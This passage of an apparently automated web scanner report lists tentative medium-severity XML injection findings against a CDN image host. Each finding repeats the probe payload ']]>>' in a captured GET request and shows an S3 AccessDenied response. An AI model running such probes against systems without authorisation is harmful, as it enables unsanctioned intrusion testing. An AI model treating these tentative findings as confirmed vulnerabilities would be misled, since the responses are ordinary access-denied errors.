The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 493A8169820B1D3F
x-amz-id-2: GZUFVgZ2gKZ8rPrFJn/WMJzJslywMJX7VzKHw0YPO9qW8DdxHxCFdLAvjSdTuHh1
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 56cd8d967d4777b5781e426f566ee55331b1077b8f75759f8d37162f4df123bc6293c9f4e84d90eb
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>493A8169820B1D3F</RequestId><HostId>GZUFVgZ2gKZ8rPrFJn/WMJzJslywMJX7VzKHw0YPO9qW8DdxHx
...[SNIP]...

8.173. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C4C7A827C24575C9
x-amz-id-2: iSZwxCAJ0rzkeO6o4a7JULu9uDGv/lSkCxiDAqU71EU5b7bx9nzGlmivbRgEnu8m
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 55085d7f0c74b088f3fb35e63961140829d5e20a135e30a6e86d82398cbb250f779914a014cf4dda
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C4C7A827C24575C9</RequestId><HostId>iSZwxCAJ0rzkeO6o4a7JULu9uDGv/lSkCxiDAqU71EU5b7bx9n
...[SNIP]...

8.174. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A85352D7054B4460
x-amz-id-2: R2hMdQkCwaCGCcSgAgufnhEYmq70PWbmF6h0+fSPqHCqNpss1sjwPHAD8wkVBe0X
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:47 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 819bd66e0793055bdc8abd1c678c4145623e06505fd5ed27f7e87430fc5dcb289ae535a022234faf
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A85352D7054B4460</RequestId><HostId>R2hMdQkCwaCGCcSgAgufnhEYmq70PWbmF6h0+fSPqHCqNpss1s
...[SNIP]...

8.175. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E38392E45A7EB899
x-amz-id-2: BaCpJ72F31aCcAohZTcWFoYxz79LQLOuVuzrRVifa0aWRuojSqNeQ/mZdUdIfjTE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5d09748321da7049ae73d487c159196d0fc9f18342b9e8597ab2338258ca56f3eb54b4c1340354fb
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E38392E45A7EB899</RequestId><HostId>BaCpJ72F31aCcAohZTcWFoYxz79LQLOuVuzrRVifa0aWRuojSq
...[SNIP]...

8.176. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E548C489DE587ED2
x-amz-id-2: GyRvXBb4DoxKJFsJloe+OPdmTSBY+5HfQRdzXPM8uZx2YfwrVbK7Fe8pZJowf92M
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 296e5c8f7cb9f665973eb671972da207c0a4549a42cec0425abc4b4039082dcfca441479fb833525
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E548C489DE587ED2</RequestId><HostId>GyRvXBb4DoxKJFsJloe+OPdmTSBY+5HfQRdzXPM8uZx2YfwrVb
...[SNIP]...

8.177. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F677591E58F78048
x-amz-id-2: AaZTh7uoYHgzfzXP5qs0XhDrk9vCa5S1dUpOnu0aNldqVfaC7fvsNgKwms23KsUf
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bbcd193fb57335bc99b2ede09175ac3a0e0d650098dc3f1588793178b1b3e8ab1f8743fd023b6023
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F677591E58F78048</RequestId><HostId>AaZTh7uoYHgzfzXP5qs0XhDrk9vCa5S1dUpOnu0aNldqVfaC7f
...[SNIP]...

8.178. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 579501718D9AD30D
x-amz-id-2: +pGROg6yM4QGqiPV9z57wPYfIdlIHlXhrnT/NQMFjt9o99fy1KtnjZMKCxptkc0/
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 51ce0d601585cb0437213d53d16b45d22db9dace54a77c32f75d01f302c12163e264cf877e3cc1f4
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>579501718D9AD30D</RequestId><HostId>+pGROg6yM4QGqiPV9z57wPYfIdlIHlXhrnT/NQMFjt9o99fy1K
...[SNIP]...

8.179. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 040861B1FF9F3BE6
x-amz-id-2: H8NKDLVdebN1Iql+UPsROzGIzeJtou5v9RcGT6zigEG2+/z5HPyM6Ep6kVDUTG6r
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:17 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ce843d90b88ab8d228742ca04c829010941f0f7c76e6ecd60965f535a87cdc01aa1dedeabac4a095
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>040861B1FF9F3BE6</RequestId><HostId>H8NKDLVdebN1Iql+UPsROzGIzeJtou5v9RcGT6zigEG2+/z5HP
...[SNIP]...

8.180. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0AC8E59FD82BB056
x-amz-id-2: CuFuHiZoTRnkAyEg0bBrPBWSOkJn0/QaybBTzxYOm+k+0AAxWVrsAVuKoVEs6ijs
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 15ec0deb01e24f1db109f95a2d66a39ab2f6e1ac12ecdea297f1a92abd365f4e23a9c8d5344a8f82
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0AC8E59FD82BB056</RequestId><HostId>CuFuHiZoTRnkAyEg0bBrPBWSOkJn0/QaybBTzxYOm+k+0AAxWV
...[SNIP]...

8.181. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A65854E64607646F
x-amz-id-2: HI4RH0xlk8O8qIP9vkAOYmndpmVbw+vcnfIy0x+gy3QPkaq1qcdg8HZXhFbZqOf/
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d36d914bf5fe47bfa918c61fe52d2bebdbb4509553f6167b895871a5a5ca7f3ffbb53b74466e0099
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A65854E64607646F</RequestId><HostId>HI4RH0xlk8O8qIP9vkAOYmndpmVbw+vcnfIy0x+gy3QPkaq1qc
...[SNIP]...

8.182. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ffcc00-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A243DB00D49611A6
x-amz-id-2: MqWk29Jfu4TmEe63/ttCMR/y8wg7TIWqyNW/MaUpvAs6WPyVK8r3SBRHKCSIROfD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:59 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6b9eef029b07f8e2bdafbfbad79fd5f7495a4cf68c7c61d4908d1da14754f5f6b805c3ac5c2e46ee
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A243DB00D49611A6</RequestId><HostId>MqWk29Jfu4TmEe63/ttCMR/y8wg7TIWqyNW/MaUpvAs6WPyVK8
...[SNIP]...

8.183. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ffcc00-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7227684629869AB4
x-amz-id-2: dwUQWEsH6XQy/yUESKtVCED3u1Ywnt4j8VBJkA7R/c56VSVuAAdcNbh/rgwTDMvv
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:10 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bd2f10b3f1a38b3ec551def7e7ade538fdc2cdd52e33a11c7f07854e8edd84b9adbf094693a7a6fe
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7227684629869AB4</RequestId><HostId>dwUQWEsH6XQy/yUESKtVCED3u1Ywnt4j8VBJkA7R/c56VSVuAA
...[SNIP]...

8.184. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ffcc00-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B35C7AD3ACB2B88D
x-amz-id-2: sWHbpfZ2JbDvQWiRHuKuMm++jXXYy3r18/9d/4GjORtjvc3jtZ4gtfRvPHEVEivc
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bccb9ba240443cd19f0d56065295eb9cbb5208690a9301865a4152e39a455995d96cba00534080b8
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B35C7AD3ACB2B88D</RequestId><HostId>sWHbpfZ2JbDvQWiRHuKuMm++jXXYy3r18/9d/4GjORtjvc3jtZ
...[SNIP]...

8.185. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png

Issue detail

